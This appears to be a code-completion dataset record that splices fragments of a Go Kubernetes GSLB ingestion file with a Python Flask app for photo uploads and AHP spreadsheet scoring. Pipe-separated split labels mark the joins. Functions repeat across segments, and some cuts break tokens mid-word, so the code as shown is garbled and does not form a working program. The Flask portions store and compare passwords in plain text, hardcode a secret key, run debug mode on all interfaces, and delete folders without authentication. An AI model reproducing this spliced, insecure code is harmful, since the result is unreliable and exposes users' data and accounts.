return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "received delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
return
}
uniqueMembersLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
aviGS.(*AviGSObjectGraph).DeleteMember(cname, ns, objName, objType)
// delete the obj from the hostname map
newUniqueMemberLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if uniqueMembersLen != newUniqueMemberLen {
metaObj.DeleteMapByKey(clusterObj)
}
gslbutils.Debugf("key: %s, gsMembers: %d, msg: checking if its a GS deletion case", key,
aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs()) == 0 {
deleteGs = true
}
} else {
// avi graph not found, return
gslbutils.Warnf("key: %s, msg: no gs key found in gs models", key)
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
if deleteGs {
// add the object to the delete cache and remove from the model cache
SharedDeleteGSGraphLister().Save(modelName, aviGS)
SharedAviGSGraphLister().Delete(modelName)
} else {
SharedAviGSGraphLister().Save(modelName, aviGS)
}
if gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func isAcceptableObject(objType string) bool {
return objType == gslbutils.RouteType || objType == gslbutils.IngressType || objType == gslbutils.SvcType
}
func DequeueIngestion(key string) {
// The key format expected here is: operation/objectType/clusterName/Namespace/objName
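// For illustration only (the operation token below is an assumed example; the object
// types Route/Ingress/Svc come from gslbutils): a key might look like
// "ADD/Route/cluster1/default/my-route".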
gslbutils.Logf("key: %s, msg: %s", key, "starting graph sync")
objectOperation, objType, cname, ns, objName := gslbutils.ExtractMultiClusterKey(key)
sharedQueue := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
if !isAcceptableObject(objType) { | gslbutils.Warnf("key: %s, msg: %s", key, "not an acceptable object, can't process")
return | random_line_split |
|
dq_ingestion.go | utils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname)
gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "received delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
return
}
uniqueMembersLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
aviGS.(*AviGSObjectGraph).DeleteMember(cname, ns, objName, objType)
// delete the obj from the hostname map
newUniqueMemberLen := len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if uniqueMembersLen != newUniqueMemberLen {
metaObj.DeleteMapByKey(clusterObj)
}
gslbutils.Debugf("key: %s, gsMembers: %d, msg: checking if its a GS deletion case", key,
aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs())
if len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs()) == 0 {
deleteGs = true
}
} else {
// avi graph not found, return
gslbutils.Warnf("key: %s, msg: no gs key found in gs models", key)
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
if deleteGs {
// add the object to the delete cache and remove from the model cache
SharedDeleteGSGraphLister().Save(modelName, aviGS)
SharedAviGSGraphLister().Delete(modelName)
} else {
SharedAviGSGraphLister().Save(modelName, aviGS)
}
if gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func isAcceptableObject(objType string) bool {
return objType == gslbutils.RouteType || objType == gslbutils.IngressType || objType == gslbutils.SvcType
}
func DequeueIngestion(key string) {
// The key format expected here is: operation/objectType/clusterName/Namespace/objName
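// For illustration only (the operation token below is an assumed example; the object
// types Route/Ingress/Svc come from gslbutils): a key might look like
// "ADD/Route/cluster1/default/my-route".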
gslbutils.Logf("key: %s, msg: %s", key, "starting graph sync")
objectOperation, objType, cname, ns, objName := gslbutils.ExtractMultiClusterKey(key)
sharedQueue := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
if !isAcceptableObject(objType) | {
gslbutils.Warnf("key: %s, msg: %s", key, "not an acceptable object, can't process")
return
} | conditional_block |
|
dq_ingestion.go | Name, key string, sharedQueue *utils.WorkerQueue) {
// First see if there's another instance of the same model in the store
modelName := tenant + "/" + gsName
bkt := utils.Bkt(modelName, sharedQueue.NumWorkers)
sharedQueue.Workqueue[bkt].AddRateLimited(modelName)
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "published key to rest layer")
}
func GetObjTrafficRatio(ns, cname string) int32 {
globalFilter := gslbutils.GetGlobalFilter()
if globalFilter == nil {
// return default traffic ratio
gslbutils.Errf("ns: %s, cname: %s, msg: global filter can't be nil at this stage", ns, cname)
return 1
}
val, err := globalFilter.GetTrafficWeight(ns, cname)
if err != nil {
gslbutils.Warnf("ns: %s, cname: %s, msg: error occurred while fetching traffic info for this cluster, %s",
ns, cname, err.Error())
return 1
}
return val
}
func | (objType, cname, ns, objName, key, storeType string) interface{} {
var store *gslbutils.ClusterStore
switch objType {
case gslbutils.RouteType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedRouteStore()
} else {
store = gslbutils.GetRejectedRouteStore()
}
if store == nil {
// Error state, the route store is not updated, so we can't do anything here
gslbutils.Errf("key: %s, msg: %s", key, "accepted route store is empty, can't add route")
return nil
}
break
case gslbutils.IngressType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedIngressStore()
} else {
store = gslbutils.GetRejectedIngressStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted ingress store is empty, can't add ingress")
return nil
}
break
case gslbutils.SvcType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname)
gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "received delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
| getObjFromStore | identifier_name |
app.py | '__getitem__'):
return dict(o)
        return super(JSONEncoder, self).default(o)  # let the base encoder handle unsupported types
app = Flask(__name__)
app.json_encoder = JSONEncoder
app.config.from_object(config)
app.config['SECRET_KEY'] = 'I have a dream'
address = 'C:\\Users\\Administrator\\Desktop\\images\\static\\'
app.config['UPLOADED_PHOTOS_DEST'] = address
app.config['MAX_CONTENT_LENGTH'] = 200 * 1024 * 1024
db = SQLAlchemy(app)
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
patch_request_class(app, size=None)  # size=None defers the upload cap to MAX_CONTENT_LENGTH above (flask-uploads' own default is 16MB)
class UploadForm(FlaskForm):
photo = FileField(validators=[FileAllowed(photos, u'只能是照片格式!'), FileRequired(u'Choose a file!')])
submit = SubmitField(u'上传')
@app.route('/', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
        # call the add method: stage the new task and commit it
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
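# Illustrative client call for /index (host/port assumed; 'folderName' and 'photo' are
# the field names read by upload_file above):
#
#   files = [('photo', open('a.jpg', 'rb')), ('photo', open('b.jpg', 'rb'))]
#   requests.post('http://localhost:8080/index', data={'folderName': 'batch1'}, files=files)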
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=True)
# app.run(debug=True)
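# NOTE: the __main__ guard above sits in the middle of the module; when this file is run
# directly, app.run() blocks there, so the routes defined below it are never registered.
# It would normally be moved after the last route definition.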
@app.route('/page_list', methods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
    # create a new Excel workbook
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
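# After create_excel runs, <folder>\data.xlsx holds the pairwise-comparison sheet that
# update_excel edits cell by cell, and result.xlsx starts out as an empty placeholder.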
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit() | folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
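# Illustrative sketch only: the real AHP class is imported elsewhere in this project and
# its implementation is not shown in this file. The hypothetical _AHPSketch below mirrors
# the calls used in submit() (supp_mat, get_evec, save_result) under the assumption that
# they complete the pairwise matrix, extract a normalised priority vector, and persist it.
class _AHPSketch(object):
    def __init__(self, matrix):
        self.matrix = matrix
    def supp_mat(self, m):
        # fill the lower triangle with reciprocals so that m[j][i] == 1 / m[i][j]
        n = m.shape[0]
        for i in range(n):
            for j in range(i + 1, n):
                if m[i][j] != 0:
                    m[j][i] = 1.0 / m[i][j]
        return m
    def get_evec(self, m):
        # principal eigenvector of the pairwise matrix, normalised to sum to 1
        vals, vecs = np.linalg.eig(m)
        vec = np.abs(vecs[:, np.argmax(vals.real)].real)
        return vec / vec.sum()
    def save_result(self, evec, folder):
        # write the priority vector into result.xlsx next to data.xlsx
        wb = openpyxl.Workbook()
        ws = wb.active
        for i, w in enumerate(evec):
            ws.cell(row=i + 1, column=1, value=float(w))
        wb.save(folder + '\\result.xlsx')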
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
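# Illustrative call: GET /update_excel/2/3/5 writes the value 5 into row 2, column 3 of
# the current task's data.xlsx (1-based in the URL, converted to 0-based indices above).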
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
    files_list = os.listdir(app.config['UPLOADED_PHOTOS_DEST'])  # build the listing the template expects
    return render_template('manage.html', files_list=files_list)
@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
    for cur_line_number, line in enumerate(open(the_file_path, 'r')):  # 'rU' mode is deprecated/removed in modern Python
if cur_line_number == line_number-1:
return line
return ''
@app.route('/getValue/<row>/<line>', methods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
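# Illustrative client call (host/port assumed; the JSON keys match what login() reads):
#
#   requests.post('http://localhost:8080/login', json={'username': 'alice', 'password': 'secret'})
#
# A successful response carries status/info/session/role; on failure status is 'no'.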
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
        # call the add method: stage the new user and commit it
db.session.add(user)
db.session.commit()
return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify('success | random_line_split |
|
app.py | '__getitem__'):
return dict(o)
raise None
app = Flask(__name__)
app.json_encoder = JSONEncoder
app.config.from_object(config)
app.config['SECRET_KEY'] = 'I have a dream'
address = 'C:\\Users\\Administrator\\Desktop\\images\\static\\'
app.config['UPLOADED_PHOTOS_DEST'] = address
app.config['MAX_CONTENT_LENGTH'] = 200 * 1024 * 1024
db = SQLAlchemy(app)
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
patch_request_class(app, size=None) # set maximum file size, default is 16MB
class UploadForm(FlaskForm):
photo = FileField(validators=[FileAllowed(photos, u'只能是照片格式!'), FileRequired(u'Choose a file!')])
submit = SubmitField(u'上传')
@app.route('/', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
        # call the add method: stage the new task and commit it
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8 | thods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
# create a new Excel file
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit()
folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
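# The AHP class used by submit() is imported from elsewhere and is not shown in
# this file. As a rough sketch of the underlying math (an assumption about what
# get_evec()/supp_mat() compute, not the actual implementation): the priority
# weights of a pairwise-comparison matrix are commonly taken from its principal
# eigenvector, normalised to sum to 1. The helper below is illustrative only
# and is never called by this module.
def _ahp_priority_weights_sketch(matrix):
    values, vectors = np.linalg.eig(np.asarray(matrix, dtype=float))
    principal = int(np.argmax(values.real))        # index of the largest eigenvalue
    weights = np.abs(vectors[:, principal].real)   # its eigenvector, made non-negative
    return weights / weights.sum()                 # normalised priority weights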
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
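# update_excel() above follows the xlrd read / copy() / write-back pattern,
# because xlrd alone cannot modify a workbook (copy() presumably comes from
# xlutils.copy in the elided imports). For reference, the same single-cell
# update with openpyxl (already used by create_excel) would look roughly like
# the sketch below; it is illustrative only and is not called anywhere.
def _update_cell_openpyxl_sketch(path, row, line, value):
    wb = openpyxl.load_workbook(path)
    ws = wb.active
    # openpyxl is 1-based, while the route converts its parameters to 0-based
    ws.cell(row=int(row) + 1, column=int(line) + 1, value=int(value))
    wb.save(path)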
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
return jsonify('success')
@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
for cur_line_number, line in enumerate(open(the_file_path, 'rU')):
if cur_line_number == line_number-1:
return line
return ''
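# getline() above re-opens names.txt and scans it on every call. The standard
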